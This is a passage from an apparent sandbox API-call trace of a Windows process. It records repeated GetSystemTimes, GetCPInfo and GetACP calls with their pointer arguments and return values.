lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.375] GetACP () returned 0x4e4 [0118.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.375] GetACP () returned 0x4e4 [0118.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.375] GetACP () returned 0x4e4 [0118.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.375] GetACP () returned 0x4e4 [0118.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.375] GetACP () returned 0x4e4 [0118.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.375] GetACP () returned 0x4e4 [0118.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.375] GetACP () returned 0x4e4 [0118.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.376] GetACP () returned 0x4e4 [0118.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.376] GetACP () returned 0x4e4 [0118.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.376] GetACP () returned 0x4e4 [0118.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.376] GetACP () returned 0x4e4 [0118.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.376] GetACP () returned 0x4e4 [0118.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.376] GetACP () returned 0x4e4 [0118.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.376] GetACP () returned 0x4e4 [0118.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.377] GetACP () returned 0x4e4 [0118.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.377] GetACP () returned 0x4e4 [0118.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.377] GetACP () returned 0x4e4 [0118.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.377] GetACP () returned 0x4e4 [0118.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.377] GetACP () returned 0x4e4 [0118.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.377] GetACP () returned 0x4e4 [0118.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.377] GetACP () returned 0x4e4 [0118.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.377] GetACP () returned 0x4e4 [0118.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.377] GetACP () returned 0x4e4 [0118.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.378] GetACP () returned 0x4e4 [0118.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.378] GetACP () returned 0x4e4 [0118.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.378] GetACP () returned 0x4e4 [0118.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.378] GetACP () returned 0x4e4 [0118.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.378] GetACP () returned 0x4e4 [0118.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.378] GetACP () returned 0x4e4 [0118.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.378] GetACP () returned 0x4e4 [0118.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.378] GetACP () returned 0x4e4 [0118.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.379] GetACP () returned 0x4e4 [0118.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.379] GetACP () returned 0x4e4 [0118.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.379] GetACP () returned 0x4e4 [0118.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.379] GetACP () returned 0x4e4 [0118.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.379] GetACP () returned 0x4e4 [0118.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.379] GetACP () returned 0x4e4 [0118.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.379] GetACP () returned 0x4e4 [0118.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.379] GetACP () returned 0x4e4 [0118.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.380] GetACP () returned 0x4e4 [0118.380] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.380] GetACP () returned 0x4e4 [0118.380] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.380] GetACP () returned 0x4e4 [0118.380] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.380] GetACP () returned 0x4e4 [0118.380] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.380] GetACP () returned 0x4e4 [0118.380] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.380] GetACP () returned 0x4e4 [0118.380] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.380] GetACP () returned 0x4e4 [0118.381] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.381] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.381] GetACP () returned 0x4e4 [0118.381] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.381] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.381] GetACP () returned 0x4e4 [0118.381] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.381] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.381] GetACP () returned 0x4e4 [0118.381] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.381] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.381] GetACP () returned 0x4e4 [0118.381] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.381] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.381] GetACP () returned 0x4e4 [0118.381] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.381] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.381] GetACP () returned 0x4e4 [0118.381] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.381] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.381] GetACP () returned 0x4e4 [0118.381] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.382] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.382] GetACP () returned 0x4e4 [0118.382] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.382] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.382] GetACP () returned 0x4e4 [0118.382] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.382] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.382] GetACP () returned 0x4e4 [0118.382] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.382] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.382] GetACP () returned 0x4e4 [0118.382] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.382] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.382] GetACP () returned 0x4e4 [0118.382] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.382] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.382] GetACP () returned 0x4e4 [0118.382] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.382] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.382] GetACP () returned 0x4e4 [0118.382] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.383] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.383] GetACP () returned 0x4e4 [0118.383] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.383] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.383] GetACP () returned 0x4e4 [0118.383] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.383] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.383] GetACP () returned 0x4e4 [0118.383] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.383] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.383] GetACP () returned 0x4e4 [0118.383] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.383] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.383] GetACP () returned 0x4e4 [0118.383] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.383] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.383] GetACP () returned 0x4e4 [0118.383] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.383] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.383] GetACP () returned 0x4e4 [0118.384] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.384] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.384] GetACP () returned 0x4e4 [0118.384] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.384] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.384] GetACP () returned 0x4e4 [0118.384] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.384] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.384] GetACP () returned 0x4e4 [0118.384] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.384] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.384] GetACP () returned 0x4e4 [0118.384] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.384] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.384] GetACP () returned 0x4e4 [0118.384] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.384] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.384] GetACP () returned 0x4e4 [0118.384] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.385] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.385] GetACP () returned 0x4e4 [0118.385] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.385] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.385] GetACP () returned 0x4e4 [0118.385] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, 